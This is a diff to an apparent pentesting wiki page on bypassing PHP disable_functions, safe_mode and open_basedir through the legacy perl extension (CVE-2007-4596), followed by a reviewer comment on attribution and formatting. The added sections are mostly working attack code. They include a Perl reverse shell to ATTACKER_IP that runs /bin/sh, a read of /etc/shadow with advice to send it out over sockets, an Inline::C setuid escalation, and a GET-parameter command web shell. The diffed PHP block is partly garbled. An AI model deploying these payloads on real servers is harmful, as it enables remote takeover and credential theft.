diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md index 102dcb79936..0a9e4fb08e5 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md @@ -2,22 +2,29 @@ {{#include ../../../../banners/hacktricks-training.md}} +## Background -From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/) +The issue tracked as **CVE-2007-4596** comes from the legacy `perl` PHP extension, which embeds a full Perl interpreter without honoring PHP's `safe_mode`, `disable_functions`, or `open_basedir` controls. Any PHP worker that loads `extension=perl.so` gains unrestricted Perl `eval`, so command execution remains trivial even when all classic PHP process-spawning primitives are blocked. Although `safe_mode` disappeared in PHP 5.4, many outdated shared-hosting stacks and vulnerable labs still ship it, so this bypass is still valuable when you land on legacy control panels. -```php -"; $perl->eval("system('".$_GET['cmd']."')"); echo "</textarea>"; $_GET['cmd']=htmlspecialchars($_GET['cmd']); -echo "
CMD:
" - +echo "
CMD:
"; ?> ``` -{{#include ../../../../banners/hacktricks-training.md}} +## Modern Payload Enhancements + +### 1. Full TTY over TCP + +The embedded interpreter can load `IO::Socket` even if `/usr/bin/perl` is blocked: + +```php +$perl = new perl(); +$payload = <<<'PL' +use IO::Socket::INET; +my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp'); +open STDIN, '<&', $c; +open STDOUT, '>&', $c; +open STDERR, '>&', $c; +exec('/bin/sh -i'); +PL; +$perl->eval($payload); +``` + +### 2. File-System Escape Even with `open_basedir` + +Perl ignores PHP’s `open_basedir`, so you can read arbitrary files: +```php +$perl = new perl(); +$perl->eval('open(F,"/etc/shadow") || die $!; print while ; close F;'); +``` + +Pipe the output through `IO::Socket::INET` or `Net::HTTP` to exfiltrate data without touching PHP-managed descriptors. + +### 3. Inline Compilation for Privilege Escalation + +If `Inline::C` exists system-wide, compile helpers inside the request without relying on PHP’s `ffi` or `pcntl`: + +```php +$perl = new perl(); +$perl->eval(<<<'PL' +use Inline C => 'DATA'; +print escalate(); +__DATA__ +__C__ +char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; } +PL +); +``` +### 4. Living-off-the-Land Enumeration +Treat Perl as a LOLBAS toolkit—e.g., dump MySQL DSNs even if `mysqli` is missing: + +```php +$perl = new perl(); +$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);'); +``` + +## References + +- [CVE-2007-4596 summary and timeline](https://www.cvedetails.com/cve/CVE-2007-4596/) +- [PECL perl extension package information](https://pecl.php.net/package/perl) + +{{#include ../../../../banners/hacktricks-training.md}}
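Review bot: the `-From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](...)` attribution is removed while the PoC script it credited stays in the file, and the new `## References` list cites only cvedetails and PECL; the original write-up should be re-added there so the source of the retained code remains documented. Two smaller points in the same hunk: in `### 2. File-System Escape Even with open_basedir` the `` ```php `` fence follows the sentence `Perl ignores PHP’s open_basedir, so you can read arbitrary files:` with no blank line, and `### 4. Living-off-the-Land Enumeration` sits directly on the closing fence of section 3, both of which break rendering in the rest of this page where every fence and heading is separated by a blank line. Finally, the hunk header `@@ -2,22 +2,29 @@` advertises 29 new-side lines, which appears far fewer than the `+` lines shown here, so the patch should be regenerated against the current file before merge to be sure it applies cleanly.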